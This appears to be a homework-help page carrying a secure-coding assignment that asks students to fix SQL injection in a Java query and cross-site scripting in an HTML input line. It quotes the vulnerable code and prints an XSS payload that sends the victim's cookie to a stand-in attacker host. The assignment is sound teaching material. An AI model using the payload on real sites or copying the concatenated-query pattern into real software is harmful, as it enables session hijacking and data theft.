Write the code fragment to transform it into a secure query

Assignment Help PL-SQL Programming

Reference no: EM133854367

Question: For each of the code fragments below, identify the type of software flaw(s) found and suggest a way to fix the issue(s). It is recommended that you identify the problem without using a computer. After identifying the problem, you may use a computer to verify your answer.

Code Fragment #1

The following SQL query is a common flaw that is susceptible to the SQL injection attack. Using Java's PreparedStatement() with variable binding, rewrite the code fragment to transform it into a secure query. Get Professional Assignment Help Service Now!

String query = "SELECT account_balance FROM user_data WHERE
user_name = " + request.getParameter("customerName");
try {
Statement = connection.createStatement( ... );
ResultSet results = statement.executeQuery( query );
}

Code Fragment #2

Using the same SQL query, rewrite the code fragment to transform it into a secure query with .NET parameterized OleDbCommand() with bind variable.

Code Fragment #3

The following HTML code snippet is susceptible to a cross-site scripting attack. It uses untrusted data without validation or escaping. This attack causes the victim's session ID to be sent to the attacker's website, allowing the attacker to hijack the user's current session by modifying the "CC" parameter. Rewrite this code snippet to correct the security flaw.

(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

The attacker modifies the ‘CC' parameter in the browser to:

'><script>document.location= 'https://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'

Submit a 1- to 3-page paper in APA format that contains the original code fragment, a description of the coding flaw in each, and your proposed solution using defensive programming/secure coding technique(s) to fix it.

Refer to the Week 8 Lab Rubric for specific grading elements and criteria. Your Instructor will use this grading rubric to assess your work.

Your document should be 1-3 pages long (not including the list of references and cover page), but it is the quality of the work that is important, not the number of pages. Cite and reference all sources using APA format and style guidelines and submit in a single document.

Reference no: EM133854367

Questions Cloud

End-to-end product life cycle : Lexis AI for the Gen AI legal assistant product and you are reponsible for the end-to-end product life cycle

Design and implement a custom file system : Design and implement a custom file system that simulates how files and directories are stored, organized and accessed on a disk

Undercover police decoy : Steve realizes that Joe is actually an undercover police decoy, and he had been set up

Identify two changes in your curriculum plan : Identify two changes in your curriculum plan that need to occur in response to the trend. Identify two instructional methods that need to change in response

Write the code fragment to transform it into a secure query : Write the code fragment to transform it into a secure query with .NET parameterized OleDbCommand() with bind variable.

What do you think biggest implications of mongol empire : What do you think the biggest implications of the Mongol Empire were - After reading the selection by Timothy May: The Mongol Empire in World History

Traditional theories of judicial review : Traditional theories of judicial review hold that neutral or principled grounds are only legitimate bases for judicial decisions and reject political motives

Each game after the national anthem : A head varsity coach in your school has asked you to allow the team to pray on the field before each game after the national anthem

Registering title and mortgage : Registering a title and mortgage There are two separate actions involved with this process:

User Account

All Pages